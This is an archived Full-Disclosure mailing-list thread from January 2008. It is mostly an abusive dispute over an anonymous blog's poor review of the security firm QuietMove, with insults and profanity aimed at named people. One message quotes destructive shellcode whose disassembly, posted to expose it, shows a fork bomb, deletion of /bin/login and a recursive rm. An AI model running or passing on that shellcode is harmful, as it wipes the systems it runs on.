Paste skills.?During this second round of review, we were able to
locate more information about Adam. We found several posts that Adam
made to different mailing lists about FreeBSD, OpenBSD, Systems
Administration, etc. We also found a rather nice PowerPoint
presentation that Adam created that clearly defined specific security
services. So we know that Adam is not an idiot, but we don?t know if
he?s actually a security guru. We?re also wondering why Adam doesn?t
create the same quality content for his QuietMove website as he did for
his presentation?In tandem with Adam?s response to our initial review
of QuietMove, Adam also had other friends and associates respond. One
of those people was Andre Gironda who had a lot of great things to say
about QuietMove, but also made the unfortunate mistake of tainting his
credibility as a professional by directly attacking other vendors.Andre
Gironda asked us who we are in one of his emails. He also indirectly
accused us of exacting vengeance on QuietMove by performing a review.
While we?ve never been accused of this before by any of our other
review subjects, we feel that we should state for the record that this
is not some sort of vengeance play.Andre Gironda also said that he can
vouch for Adam?s 14 years of experience ?and then some?. Apparently
when Andre met Adam of QuietMove, Adam was working as a Unix Security
Administrator for Unphamiliar. Territories (UPT), ?a vulnerability
research BBS that ran from 1989 ? 1996. Also according to Andre Gironda
?. It was a prominent place for information about vulnerability
research. Many held it in higher regard than Phrack magazine or any
leading website/magazine during that time period.?Sorry Andre, but we
don?t agree with your statement about UPT. Even more importantly, we?re
not sure how Adam?s experience as a Unix Security administrator (aka
systems admin) will help him offer professional IT Security Services.
Adam needs to be able to protect his clients from real world hackers,
not from failed tape backups and disk crashes.Andre went on to say that
many ?small businesses such as QuietMove have a hard enough time
staying alive in this industry.? He said ?I suggest you pick on someone
yourown size even if you have a legitimate problem with QuietMove or
Adam.? Our response is that we have no problem with Adam or QuietMove.
We found QuietMove by doing a google search for Penetration Testing.In
a Different email Andre lost all credibility with us because he decided
to directly attack other companies that we?ve reviewed that received
higher grades. If you compare the score cards between QuietMove and the
other company that Andre bashes, you?ll see why they got the good
grade. Anyway, here?s what Andre had to say (we?ll comment
later):?Look, you rated Denim Group as A-. You must either work there -
orknow the guys. Dan Cornell is a moron compared to Adam Muntner -
andhis code is certainly worse (e.g. Sprajax).Adam and team know Burp
Suite, use manual web application testing - inaddition to traditional
dynamic and static analysis.I have seen Adam and crew using Fortify
Software's SCA and Tracertools. I have seen them using Hailstorm ARC
and modifying theJavascript included in the SmartAttack library. I
would call this abest-of-breed security testing methodology.I have
worked for many small companies myself who do not use ANYautomated
testing, including both open-source and commercial tools. Ithink this
is stupid... and spent most of my time writing `for' loopsin shell just
to get around their limitation on "not writing scriptsto automate
things".I have also worked for small companies that "only" use
scriptinglanguages, or only use "the best" scripting language (usually
Ruby,Python, or Perl) and write all their own automated tools. This
isalso stupid -- especially when existing toolsets have lots of
greatcapability -- it's like re-inventing the wheel.Of course there are
places that "only use" commercial automated tools,but I haven't
actually met one yet. When I do -- I'll go ahead andpost an obnoxious
review about them. More people will read mine thananything you do --
and with my name on it -- they are certainly boundto take it a lot more
seriously.?Andre lost all credibility with our team when he insulted
the Denim Group. We contacted the Denim Group and spoke directly with
one of their founders when we did their review. Not only were we very
impressed with them, but they provided us with great detail about their
testing methodologies and service capabilities. Adam, Andre and the
rest of the QuietMove team haven?t provided us with anything tangible
yet, and we?ve asked. When we tried to contact them the first time we
couldn?t get hold of them, same for the second.We?re still waiting to
hear back from Adam at QuietMove with answers to our questions about
the QuietMove services. If we hear back, we?ll modify this blog entry
yet again to properly reflect what we feel is the truth. We?d also like
to make the professional suggestion that QuietMove think about their
professional image before they respond to anyone in public forum. Not
only does their reaction not look good but it could make prospective
customers turn away.Lastly, with respect to our comment about Marcin
Wielgoszewski, a QuietMove consultant being ?Green?, he confirmed that
for us in an email. He wrote ?You're right. I'm new and young and I'll
be the first to admit it. We can't all be born security gurus, and I'm
not trying to hide that, but me aside... what have you done besides
hide behind your gmail accountand troll FD? Thanks for pointing out
those two pages, two pages out of 100's thatwere posted a long time ago
and yes, are very out of date.?All in all it is our professional
opinion is still that QuietMove doesn?t have significant ?strong? human
talent behind their services. They appear to be a very small company
run by someone that is not a ?hacker? by nature but instead is a
systems administrator or your advanced IT guy with a good understanding
of Web Application Security. If you are looking to truly defend
yourselves against malicious hackers then we suggest finding a
different provider.Note: If we receive any information back from
QuietMove, other than what we?ve received in emotional reactions, then
we?ll consider adding that information to this review. If QuietMove can
provide us with proof of capability then we will accurately reflect
that capability here. We?re not in the business of bashing anyone even
if they bash us or disrespect us. We are in the business of exposing
Professional IT Security Service providers for what they really are to
the best of our ability.If you feel that QuietMove deserves a better
grade and can provide us with legitimate reasons as to why, then please
comment and we?ll consider it. (Even after all of their insults.)Score
Card (Click to Enlarge)

--
Posted By secreview to Professional IT Security Providers - Exposed at
1/01/2008 10:38:00 PM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/b188bd6e/attachment.html 

From andreg at gmail.com  Wed Jan  2 06:02:43 2008
From: andreg at gmail.com (Andre Gironda)
Date: Tue, 1 Jan 2008 23:02:43 -0700
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( D - )
In-Reply-To: <e9d9d4020801012051k3cd0bc9eu161401214b9be62f@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
	<2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
	<e9d9d4020801011411y5b14122fnbaaa958fd6fb5c69@mail.gmail.com>
	<2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
	<e9d9d4020801012051k3cd0bc9eu161401214b9be62f@mail.gmail.com>
Message-ID: <2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com>

On Jan 1, 2008 9:51 PM, reepex <reepex at gmail.com> wrote:
> ok so they are nothing alike because ptp/hts actually teach you stuff while
> "UPT" was for jokes... so your post was stupid

The joke's on you since you don't have the context.

> I am not a part of secreview but I realize following email threads is very
> complicated for you.

It's not complicated.  I simply just don't care about who you are as
it relates to the thread.  You appear to be attacking the
person/people I'm defending, while at the same time defending the
secreview post.

> So you list 5 tools they use then mention they modify a javascript
> library...  So basically they use automated tools and  are former  web
> developers ... sound pretty hardcore

Javascript is more than just a language for web developers, especially
when utilized in the Hailstorm SmartAttack library, which isn't a
Javascript library.  These are completely different concepts.  It
should also be noted that both Burp Suite and Hailstorm ARC can be
used in manual and hybrid modes... with step-modes and form-trainers.
They can modify their traversals and have tons of extra customization
on top of what other offerings provide... and can customize the
underlying "data-driven" attacks.

Certainly you've read some of Adam Muntner's comments on, say,
ha.ckers.org and other places?

Allow me to pick on someone in the industry for a second: RSnake.

RSnake has an advertisement up on his website that asks, "Which web
application scanner can hack it?" "Check the Oct 15 post for study
results:"
http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/

Most idiots will only read what RSnake / Larry Suto have written, and
will completely miss the comments by Adam Muntner.  Adam not only
eloquently puts down the testing techniques by Larry Suto, but also
makes mention about proper customization of tools and testing outside
of the commercial scanners.

Effectively, Adam Muntner is one of the only people that does
understand this problem that you specifically says that he does not,
and that the secreview challenge seems to care about most of all other
points.

Where was reepex, where was secreview when RSnake and Larry Suto
blundered our industry into submission?  Why pick on a hero like Adam
Muntner instead?  What are you getting out of it?

Worse - RSnake hasn't been called out on this yet - but he has good
reason to promote Larry's paper.  In fact, it may even be a monetary
reason.  In an article for INSECURE Magazine, they interview RSnake
(page 30):
http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf

Question; What web application scanners do you use?

RSnake: [...] my favorite tools in my arsenal (including the manual
ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap,
NTOSpider (commerical), httprint, Cain, sn00per, Absynthe, Sqlninja, a
half dozen Firefox plugins like Webdeveloper, JSView, NoScript,
Greasemonkey etc... and the entire suite of unix utils out there, like
wget, telnet, ncftp, etc.

Notice the only commercial tool listed in NTOSpider.  Coincidence?

Apparently, too much admiration of a single web application security
scanning vendor can be a bad thing.  Larry Suto has only ever worked
with Eric Caso at NTObjectives.

Adam Muntner has been a customer of several CWE-Compatible and
aspiring companies out there.  He has a balanced view of both the
commercial tools and the open-source world, as well as building his
own tools from scratch as the need may be.

> You must be a cissp because you take yourself and the internet very
> seriously. I am pretty sure no one cares about your opinion either.

Wrong again; as always.

Cheers,
Andre



From andreg at gmail.com  Wed Jan  2 07:56:33 2008
From: andreg at gmail.com (Andre Gironda)
Date: Wed, 2 Jan 2008 00:56:33 -0700
Subject: [Full-disclosure] [Professional IT Security Providers -
	Exposed] QuietMove ( F + )
In-Reply-To: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
Message-ID: <2fd9390e0801012356y50af7086o548e2c89ea6996fa@mail.gmail.com>

On Jan 2, 2008 12:17 AM, secreview <secreview at hushmail.com> wrote:
> Regardless, Adam did react to our website comments, and his reaction was as
> follows, verbatim:

Secreview is clearly anything less than professional. I would say this
is a repeat of "InfoSecSellout" if not the exact same people.

> In a Different email Andre lost all credibility with us because he decided
> to directly attack other companies that we've reviewed that received higher
> grades. If you compare the score cards between QuietMove and the other
> company that Andre bashes, you'll see why they got the good grade. Anyway,
> here's what Andre had to say (we'll comment later):

If I know something bad about a company that you gave a good grade to,
I feel the need to bash that company based on your reputation alone.

In other words, since you can't be trusted; I feel the need to offset
any good things you've said by adding my own commentary.

Every security consulting company is unique (have their own unique
good/bad points).  Many are small and as I said before, "fighting just
to stay in business".  If you are going to give poor reviews, I
suggest you write them up and keep them to yourself instead of
publishing them.

For one of the companies that I worked for in the past, we had a
special way of analyzing new products/services.  In our assessments,
we would gather up all of the good points of the best vendors --
instead of focusing on the bad points of vendors that failed our
criteria.

It takes a special kind of asshole to do what you do.  I also believe
that you know this, and only by hiding behind anonymity are you
willing to continue to do what it is that you do.

As far as losing credibility with you, I'm clearly fine with that...
I'll be getting plenty of free beer from others who dislike you.
Maybe your nepotism will pay off with the companies you give good
grades to.  Maybe you'll win a Nobel Prize for your amazing
methodology of rating security consulting companies by their websites,
as well as the scientific method (i.e. using Google to search
mailing-lists for people's names).

Cheers,
Andre



From hijacker at oldum.net  Wed Jan  2 12:40:11 2008
From: hijacker at oldum.net (Nikolay Kichukov)
Date: Wed, 02 Jan 2008 14:40:11 +0200
Subject: [Full-disclosure] here
In-Reply-To: <421EB9F4-9840-49D5-8DE4-0A3A40EED8D2@gmail.com>
References: <61dea3e30712201851i32064080s2dec5588730f70e9@mail.gmail.com>
	<421EB9F4-9840-49D5-8DE4-0A3A40EED8D2@gmail.com>
Message-ID: <477B862B.6040808@oldum.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Thanks Andrew! Nice catch! ;-)

Cheers,
- -Nikolay

Andrew Farmer wrote:
> On 20 Dec 07, at 18:51, onion ring wrote:
> <snip>
>> char sc[] =
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
>>  "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80"
>>  "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80"
>>  "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42"
>>  "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31"
>>  "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F"
>>  "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F"
>>  "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72"
>>  "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2"
>>  "\x04\x0B\xCD\x80";
> <snip>
> 
> Abbreviated disassembly:
>    signal(SIGHUP, SIG_IGN)
>    something that looks like a 15-level deep fork() bomb
>    something involving kill()
>    unlink("/bin/login")
>    execve("//bin/rm", {"//bin/rm", "-rff", "*///"})
> 
> You could at least try to obfuscate your constants a little better.  
> That was way too easy.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBR3uGKzFLYVOGGjgXAQLqzwgAo4UyRGOIGKt2rHK32x17Imt5axyJIHQF
+sIq8NsJzw5U5psM63MrxIkKajW2c/THOUIbFR4TaFAt1/ng3covsJHh1iX6bpfN
uD18QTY3FHPIv9LNXoYgtJmLiUBFqY1AWXd5ih1e/LMRa9ZP8KVjv14EnmJom8tP
qL/WEtYjq60reaLpLpowhVLi4q1KKjvC4BoRz7zGmp26As6ah/5HmYpjpsiA7cKg
v7959l4bQsy0QHG6YP+pY8PfQX3KmhFns1yAsQF93TMGx3N8LYa1fdcXkZLrw5nf
L8tI3QZ+Qhu4lck+QzElCtD3sUuB4z/ae+KsJWWJuGoDe7CdrR5Yug==
=bBbH
-----END PGP SIGNATURE-----



From adam.muntner at quietmove.com  Wed Jan  2 14:32:42 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 09:32:42 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
Message-ID: <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>

Andre is a friend but not an employee or representative of the  
business- HOWEVER - There were a number of innacuracies in his  
statements about me. A selection of corrections to statements are below.

- I never ran UPT
- all the speculation about our methodology and pricing was wrong.
- the quantity ofautomated vs hands on testing we perform are based on  
what the customer is willing to pay for. Novel concept. We explain  
carefully what can and can't be found. The customer select their  
apporpriate level of risk acceptce based on the value of the target of  
evaluation and their budget. We always try to go above and beyond.
- our overhead is low-no giant headquarters - we are virtual mostly  
except for a rack cage. We don't have to support a giant marketing  
team and don't do $20k trade show booths. As a result that isn't built  
into our pricing.
- I was never a 'uNIX admin' but did engineer one of the early  
commercially avail Beowulf clusters - in 1998 - and have run some unix  
boxes, meaning it took all of 3 hours a month of my time, but i was  
not a 'unix admin' by any stretch of the imagination. The opennsd  
posts were from what,10 years ago?
More evidence of your poor arithmetic skills from the initial post.
- the website wasn't updated because I am taking a vacation to NYC and  
would rather enjoy myself than meet some 12 hour unmentioned timetable  
to edit the website by an anonymous coward pfy.
- they weren't insults, they were sarcastic though accurate  
representations of you'd subpar ( at best) review capabilities
- others but really, who cares? You are not interested in facts as I  
will prove below.

Your analysis is worthless. Several weeks ago you posted your alleged  
methodology. It included contacting the vendor PRIOR to review, which  
you didnt do. You also didnt notify us of the review. I read it on fd  
myself.

You sent a list of questions on new years day, after you posted the  
review, and half a day later posted your re review without again  
contacting me directly except with a monster list of questions - not  
so much as a phone call. You alleged review was based on list noise,  
not speaking with me.

You still have yet to post your scoring methodology as promised. You  
fail.

Frankly I find the drama and anonymous weenie-waving on this list to  
be tedious. FD is more a running joke than a productive mailing list.  
Save the drama fo yo mama.

On my timetable I'll respond to your questions.... To the list, not to  
you directly. Frankly I don't trust you to represent them accurately.  
Right now I'm going to visit the metropolitan museum of art, and  
tonight go party - not answer your essay test. Sorry to dissapoint.

As a number of list members commented privately to me - you don't  
deserve the attention.

That said, if you can prove you will follow your own previously stated  
methodology, I'll re review your review system. Following your  
methodology I will post a f----------- score in 6-12 hours or maybe  
sooner if you don't respond.

That's a joke, son. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix.  
I guess that makes me a unix admin!

On Jan 2, 2008, at 2:17 AM, secreview <secreview at hushmail.com> wrote:

> Our first QuietMove review can be found here.
>
> QuietMove, located at http://www.quietmove.com is a Professional IT  
> Security Services company that was founded by Adam Muntner, Jeffrey  
> Rassas and James G. (Jim) Garvey, Jr. We?ve already performed one re 
> view of QuietMove but Adam Munter and his team didn?t like the revie 
> w. As a result, we?ve gone back and revisited our data and are produ 
> cing this second, hopefully more accurate review.
>
> Our first point of criticism is still the QuietMove web-site. Their  
> services are poorly defined, and even somewhat contradictory. For  
> example, under their Penetration Testing section they nearly bash  
> the use of Automated tools. Shortly thereafter they go on to say  
> that they offer services for nearly the same cost as ?cookie- 
> cutter? services.
>
> Well, we still have a problem with that.  The overhead cost of using  
> quality talent is always going to be far greater than the fees  
> charged by vendors that sell automated scanning software. Any time  
> someone tells us that they can offer ?expert driven? services at  
> the same price points or even nearly the same as a ?cookie  
> cutter? service, we say bullshit.
>
> Taking it a step further, we still stick by our previous opinion  
> that the QuietMove website doesn?t have much to offer prospective cu 
> stomers in the way of useful information. The services shown are ver 
> y poorly defined; the grammar is still horrible, and frankly the web 
> site is incomplete. Want to see what we mean, click on their ?Social 
>  Engineering? tab under their service offerings; you?ll notice  
> that there is no description. We hope that their website does not re 
> flect the quality of their services.
>
> When Adam Muntner read our previous post where we commented on the  
> QuietMove Website he responded in a reactive, emotional, and  
> unprofessional manner. You can read his response to our first post  
> here, insults and all. Unfortunately for Adam, his unprofessional  
> attitude hurt QuietMove during this second review.
>
> Regardless, Adam did react to our website comments, and his reaction  
> was as follows, verbatim:
>
> ?Most of our clients are referred by others who are very satisfied w 
> ith the work we perform. Not by the website. It doesn't get a lot of 
>  attention - were small but growing and focused on serving our clien 
> ts. I know basic HTML seems like the pinnacle of achievement to you, 
>  but we aren't in the business of making pretty web pages. We discus 
> s our methodology with our clients-we don't post it on the web. I kn 
> ow you were hoping to learn nimething. Hacking for dummies might be  
> more your speed, after you perfect your Cunt and Paste skills.?
>
> During this second round of review, we were able to locate more  
> information about Adam. We found several posts that Adam made to  
> different mailing lists about FreeBSD, OpenBSD, Systems  
> Administration, etc. We also found a rather nice PowerPoint  
> presentation that Adam created that clearly defined specific  
> security services. So we know that Adam is not an idiot, but we don? 
> t know if he?s actually a security guru. We?re also wondering why  
> Adam doesn?t create the same quality content for his QuietMove websi 
> te as he did for his presentation?
>
> In tandem with Adam?s response to our initial review of QuietMove, A 
> dam also had other friends and associates respond. One of those peop 
> le was Andre Gironda who had a lot of great things to say about Quie 
> tMove, but also made the unfortunate mistake of tainting his credibi 
> lity as a professional by directly attacking other vendors.
>
> Andre Gironda asked us who we are in one of his emails. He also  
> indirectly accused us of exacting vengeance on QuietMove by  
> performing a review. While we?ve never been accused of this before b 
> y any of our other review subjects, we feel that we should state for 
>  the record that this is not some sort of vengeance play.
>
> Andre Gironda also said that he can vouch for Adam?s 14 years of exp 
> erience ?and then some?. Apparently when Andre met Adam of  
> QuietMove, Adam was working as a Unix Security Administrator for Unp 
> hamiliar. Territories (UPT), ?a vulnerability research BBS that ran  
> from 1989 ? 1996. Also according to Andre Gironda ?. It was a  
> prominent place for information about vulnerability research. Many h 
> eld it in higher regard than Phrack magazine or any leading website/ 
> magazine during that time period.?
>
> Sorry Andre, but we don?t agree with your statement about UPT. Even  
> more importantly, we?re not sure how Adam?s experience as a Unix  
> Security administrator (aka systems admin) will help him offer profe 
> ssional IT Security Services. Adam needs to be able to protect his c 
> lients from real world hackers, not from failed tape backups and dis 
> k crashes.
>
> Andre went on to say that many ?small businesses such as QuietMove h 
> ave a hard enough time staying alive in this industry.? He said  
> ?I suggest you pick on someone your
> own size even if you have a legitimate problem with QuietMove or  
> Adam.? Our response is that we have no problem with Adam or QuietMov 
> e. We found QuietMove by doing a google search for Penetration Testi 
> ng.
>
> In a Different email Andre lost all credibility with us because he  
> decided to directly attack other companies that we?ve reviewed that  
> received higher grades. If you compare the score cards between Quiet 
> Move and the other company that Andre bashes, you?ll see why they go 
> t the good grade. Anyway, here?s what Andre had to say (we?ll  
> comment later):
>
> ?Look, you rated Denim Group as A-. You must either work there - or
> know the guys. Dan Cornell is a moron compared to Adam Muntner - and
> his code is certainly worse (e.g. Sprajax).
>
> Adam and team know Burp Suite, use manual web application testing - in
> addition to traditional dynamic and static analysis.
>
> I have seen Adam and crew using Fortify Software's SCA and Tracer
> tools. I have seen them using Hailstorm ARC and modifying the
> Javascript included in the SmartAttack library. I would call this a
> best-of-breed security testing methodology.
>
> I have worked for many small companies myself who do not use ANY
> automated testing, including both open-source and commercial tools. I
> think this is stupid... and spent most of my time writing `for' loops
> in shell just to get around their limitation on "not writing scripts
> to automate things".
>
> I have also worked for small companies that "only" use scripting
> languages, or only use "the best" scripting language (usually Ruby,
> Python, or Perl) and write all their own automated tools. This is
> also stupid -- especially when existing toolsets have lots of great
> capability -- it's like re-inventing the wheel.
>
> Of course there are places that "only use" commercial automated tools,
> but I haven't actually met one yet. When I do -- I'll go ahead and
> post an obnoxious review about them.  More people will read mine than
> anything you do -- and with my name on it -- they are certainly bound
> to take it a lot more seriously.?
>
> Andre lost all credibility with our team when he insulted the Denim  
> Group. We contacted the Denim Group and spoke directly with one of  
> their founders when we did their review. Not only were we very  
> impressed with them, but they provided us with great detail about  
> their testing methodologies and service capabilities. Adam, Andre  
> and the rest of the QuietMove team haven?t provided us with anything 
>  tangible yet, and we?ve asked. When we tried to contact them the fi 
> rst time we couldn?t get hold of them, same for the second.
>
> We?re still waiting to hear back from Adam at QuietMove with answers 
>  to our questions about the QuietMove services. If we hear back, we? 
> ll modify this blog entry yet again to properly reflect what we feel 
>  is the truth. We?d also like to make the professional suggestion th 
> at QuietMove think about their professional image before they respon 
> d to anyone in public forum. Not only does their reaction not look g 
> ood but it could make prospective customers turn away.
>
> Lastly, with respect to our comment about Marcin Wielgoszewski, a  
> QuietMove consultant being ?Green?, he confirmed that for us in  
> an email. He wrote ?You're right. I'm new and young and I'll be the  
> first to admit it. We can't all be born security gurus, and I'm not  
> trying to hide that, but me aside... what have you done besides hide 
>  behind your gmail account
> and troll FD? Thanks for pointing out those two pages, two pages out  
> of 100's that
> were posted a long time ago and yes, are very out of date.?
>
> All in all it is our professional opinion is still that QuietMove  
> doesn?t have significant ?strong? human talent behind their  
> services. They appear to be a very small company run by someone that 
>  is not a ?hacker? by nature but instead is a systems  
> administrator or your advanced IT guy with a good understanding of W 
> eb Application Security. If you are looking to truly defend yourselv 
> es against malicious hackers then we suggest finding a different pro 
> vider.
>
> Note: If we receive any information back from QuietMove, other than  
> what we?ve received in emotional reactions, then we?ll consider  
> adding that information to this review. If QuietMove can provide us  
> with proof of capability then we will accurately reflect that capabi 
> lity here. We?re not in the business of bashing anyone even if they  
> bash us or disrespect us. We are in the business of exposing Profess 
> ional IT Security Service providers for what they really are to the  
> best of our ability.
>
> If you feel that QuietMove deserves a better grade and can provide  
> us with legitimate reasons as to why, then please comment and we?ll  
> consider it. (Even after all of their insults.)
>
> Score Card (Click to Enlarge)
>
>
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed  
> at 1/01/2008 10:38:00 PM
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080102/5991e814/attachment.html 

From adam.muntner at quietmove.com  Wed Jan  2 14:45:37 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 09:45:37 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
	<69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
Message-ID: <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>

Just to be clear the corrections to secreview reepex and Andre were  
intermingled.

The ones I mentioned were the ones secreview and reepex, the anonymous  
cowards too embarrassed by their own ignorant commentary to stand  
behind them, called out.

Dre thx for pointing out the ha.ckers.org posts. More evidence of  
secreview selective quotation and/or ability to 'research'

He can't even spell the name of the company he reviews correctly.

Secreview re-re-score-  
f---------------------------------------------------------------.

:)

Ho hum!

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 9:32 AM, Adam Muntner <adam.muntner at quietmove.com>  
wrote:

> Andre is a friend but not an employee or representative of the  
> business- HOWEVER - There were a number of innacuracies in his  
> statements about me. A selection of corrections to statements are  
> below.
>
> - I never ran UPT
> - all the speculation about our methodology and pricing was wrong.
> - the quantity ofautomated vs hands on testing we perform are based  
> on what the customer is willing to pay for. Novel concept. We  
> explain carefully what can and can't be found. The customer select  
> their apporpriate level of risk acceptce based on the value of the  
> target of evaluation and their budget. We always try to go above and  
> beyond.
> - our overhead is low-no giant headquarters - we are virtual mostly  
> except for a rack cage. We don't have to support a giant marketing  
> team and don't do $20k trade show booths. As a result that isn't  
> built into our pricing.
> - I was never a 'uNIX admin' but did engineer one of the early  
> commercially avail Beowulf clusters - in 1998 - and have run some  
> unix boxes, meaning it took all of 3 hours a month of my time, but i  
> was not a 'unix admin' by any stretch of the imagination. The  
> opennsd posts were from what,10 years ago?
> More evidence of your poor arithmetic skills from the initial post.
> - the website wasn't updated because I am taking a vacation to NYC  
> and would rather enjoy myself than meet some 12 hour unmentioned  
> timetable to edit the website by an anonymous coward pfy.
> - they weren't insults, they were sarcastic though accurate  
> representations of you'd subpar ( at best) review capabilities
> - others but really, who cares? You are not interested in facts as I  
> will prove below.
>
> Your analysis is worthless. Several weeks ago you posted your  
> alleged methodology. It included contacting the vendor PRIOR to  
> review, which you didnt do. You also didnt notify us of the review.  
> I read it on fd myself.
>
> You sent a list of questions on new years day, after you posted the  
> review, and half a day later posted your re review without again  
> contacting me directly except with a monster list of questions - not  
> so much as a phone call. You alleged review was based on list noise,  
> not speaking with me.
>
> You still have yet to post your scoring methodology as promised. You  
> fail.
>
> Frankly I find the drama and anonymous weenie-waving on this list to  
> be tedious. FD is more a running joke than a productive mailing  
> list. Save the drama fo yo mama.
>
> On my timetable I'll respond to your questions.... To the list, not  
> to you directly. Frankly I don't trust you to represent them  
> accurately. Right now I'm going to visit the metropolitan museum of  
> art, and tonight go party - not answer your essay test. Sorry to  
> dissapoint.
>
> As a number of list members commented privately to me - you don't  
> deserve the attention.
>
> That said, if you can prove you will follow your own previously  
> stated methodology, I'll re review your review system. Following  
> your methodology I will post a f----------- score in 6-12 hours or  
> maybe sooner if you don't respond.
>
> That's a joke, son. ;)
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sorry for typos - sent from my 31337 jailbroken iPhone. It runs  
> unix. I guess that makes me a unix admin!
>
> On Jan 2, 2008, at 2:17 AM, secreview <secreview at hushmail.com> wrote:
>
>> Our first QuietMove review can be found here.
>>
>> QuietMove, located at http://www.quietmove.com is a Professional IT  
>> Security Services company that was founded by Adam Muntner, Jeffrey  
>> Rassas and James G. (Jim) Garvey, Jr. We?ve already performed one  
>> review of QuietMove but Adam Munter and his team didn?t like the r 
>> eview. As a result, we?ve gone back and revisited our data and are 
>>  producing this second, hopefully more accurate review.
>>
>> Our first point of criticism is still the QuietMove web-site. Their  
>> services are poorly defined, and even somewhat contradictory. For  
>> example, under their Penetration Testing section they nearly bash  
>> the use of Automated tools. Shortly thereafter they go on to say  
>> that they offer services for nearly the same cost as ?cookie-cutte 
>> r? services.
>>
>> Well, we still have a problem with that. The overhead cost of using  
>> quality talent is always going to be far greater than the fees  
>> charged by vendors that sell automated scanning software. Any time  
>> someone tells us that they can offer ?expert driven? services at  
>> the same price points or even nearly the same as a ?cookie  
>> cutter? service, we say bullshit.
>>
>> Taking it a step further, we still stick by our previous opinion  
>> that the QuietMove website doesn?t have much to offer prospective  
>> customers in the way of useful information. The services shown are 
>>  very poorly defined; the grammar is still horrible, and frankly t 
>> he website is incomplete. Want to see what we mean, click on their 
>>  ?Social Engineering? tab under their service offerings;  
>> you?ll notice that there is no description. We hope that their web 
>> site does not reflect the quality of their services.
>>
>> When Adam Muntner read our previous post where we commented on the  
>> QuietMove Website he responded in a reactive, emotional, and  
>> unprofessional manner. You can read his response to our first post  
>> here, insults and all. Unfortunately for Adam, his unprofessional  
>> attitude hurt QuietMove during this second review.
>>
>> Regardless, Adam did react to our website comments, and his  
>> reaction was as follows, verbatim:
>>
>> ?Most of our clients are referred by others who are very satisfied 
>>  with the work we perform. Not by the website. It doesn't get a lo 
>> t of attention - were small but growing and focused on serving our 
>>  clients. I know basic HTML seems like the pinnacle of achievement 
>>  to you, but we aren't in the business of making pretty web pages. 
>>  We discuss our methodology with our clients-we don't post it on t 
>> he web. I know you were hoping to learn nimething. Hacking for dum 
>> mies might be more your speed, after you perfect your Cunt and Pas 
>> te skills.?
>>
>> During this second round of review, we were able to locate more  
>> information about Adam. We found several posts that Adam made to  
>> different mailing lists about FreeBSD, OpenBSD, Systems  
>> Administration, etc. We also found a rather nice PowerPoint  
>> presentation that Adam created that clearly defined specific  
>> security services. So we know that Adam is not an idiot, but we do 
>> n?t know if he?s actually a security guru. We?re also  
>> wondering why Adam doesn?t create the same quality content for his 
>>  QuietMove website as he did for his presentation?
>>
>> In tandem with Adam?s response to our initial review of QuietMove, 
>>  Adam also had other friends and associates respond. One of those  
